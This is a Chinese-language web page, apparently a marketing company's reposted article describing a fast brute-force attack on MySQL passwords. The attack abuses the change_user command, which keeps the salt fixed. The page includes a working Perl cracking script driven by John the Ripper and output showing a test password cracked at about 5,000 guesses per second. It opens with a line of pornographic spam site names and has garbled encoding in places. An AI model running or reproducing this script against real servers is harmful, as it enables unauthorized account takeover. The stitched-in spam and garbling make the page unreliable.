日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
快速高效的破解MySQL本地和遠程密碼

快速的 MySQL 本地和遠程密碼破解!首先需要對數(shù)據(jù)庫維護人員說明的是,不必緊張,你無需修補這個問題,看起來其實是個小錯誤而已。

我找到一個方法可非常高效的破解 MySQL 的用戶密碼,包括本地用戶和通過網(wǎng)絡方式訪問的用戶密碼。在我的測試中,通過網(wǎng)絡方式的方法可每秒鐘測試 5000 個密碼。

方法如下:

攻擊者使用一個無特權(quán)帳號登錄到 MySQL 服務器,mysql 有一個名為 change_user 的命令,該命令可用于在 mysql 會話中修改用戶時的名字建議。因為這個命令執(zhí)行非常快,因此可以很快速的用來破解 mysql 密碼,而不是每次都重新連接到 mysql 服務器。

是什么導致非常慢?

因為使用 change_user 命令不會更改 SALT(這是一個弱點),而常規(guī)破解密碼的方法每次連接時服務器都發(fā)送不同的 SALT。

下面是一個 Perl 腳本使用了 John the Ripper 的方法來生成密碼:

測試的用戶是 crackme 密碼為 pass,只需數(shù)秒就可破解。

(大約 20 秒鐘可測試 10 萬密碼)

測試腳本如下:

 
 
 
    
  
  
  
  1. use Net::MySQL; 
    2. 
  
  
  
  2.  
    3. 
  
  
  
  3. $|=1; 
    4. 
  
  
  
  4.  
    5. 
  
  
  
  5. my $mysql = Net::MySQL->new( 
    6. 
  
  
  
  6. hostname => ’192.168.2.3′, 
    7. 
  
  
  
  7. database => ‘test’, 
    8. 
  
  
  
  8. user     => “user”, 
    9. 
  
  
  
  9. password => “secret”, 
    10. 
  
  
  
  10. debug => 0, 
    11. 
  
  
  
  11. ); 
    12. 
  
  
  
  12.  
    13. 
  
  
  
  13. $crackuser = “crackme”; 
    14. 
  
  
  
  14.  
    15. 
  
  
  
  15. while() { 
    16. 
  
  
  
  16. chomp; 
    17. 
  
  
  
  17. $currentpass = $_; 
    18. 
  
  
  
  18.  
    19. 
  
  
  
  19. $vv = join “”, 
    20. 
  
  
  
  20.         $crackuser, 
    21. 
  
  
  
  21.         “\x14″. 
    22. 
  
  
  
  22.         Net::MySQL::Password->scramble( 
    23. 
  
  
  
  23.             $currentpass, $mysql->{salt}, $mysql->{client_capabilities} 
    24. 
  
  
  
  24.         ) . “”; 
    25. 
  
  
  
  25. if ($mysql->_execute_command(“\x11″, $vv) ne undef) { 
    26. 
  
  
  
  26.     print “[*] Cracked! –> $currentpass\n”; 
    27. 
  
  
  
  27.     exit; 
    28. 
  
  
  
    29. 
  
  
  
    30.

下面是我這臺機器上的執(zhí)行結(jié)果:

 
 
 
    
  
  
  
  1. C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo 
    2. 
  
  
  
  2.  
    3. 
  
  
  
  3. hn –incremental –stdout=5 | perl mysqlcrack.pl 
    4. 
  
  
  
  4. Warning: MaxLen = 8 is too large for the current hash type, reduced to 5 
    5. 
  
  
  
  5. words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH 
    6. 
  
  
  
  6. words: 24573  time: 0:00:00:04  w/s: 4916  current: rap 
    7. 
  
  
  
  7. words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3 
    8. 
  
  
  
  8. words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429 
    9. 
  
  
  
  9. words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141 
    10. 
  
  
  
  10. words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n 
    11. 
  
  
  
  11. words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2 
    12. 
  
  
  
  12. [*] Cracked! –> pass 
    13. 
  
  
  
  13. words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs 
    14. 
  
  
  
  14.  
    15. 
  
  
  
  15. Session aborted 
    16.

當前文章:快速高效的破解MySQL本地和遠程密碼
當前網(wǎng)址:http://www.dlmjj.cn/article/dhicedc.html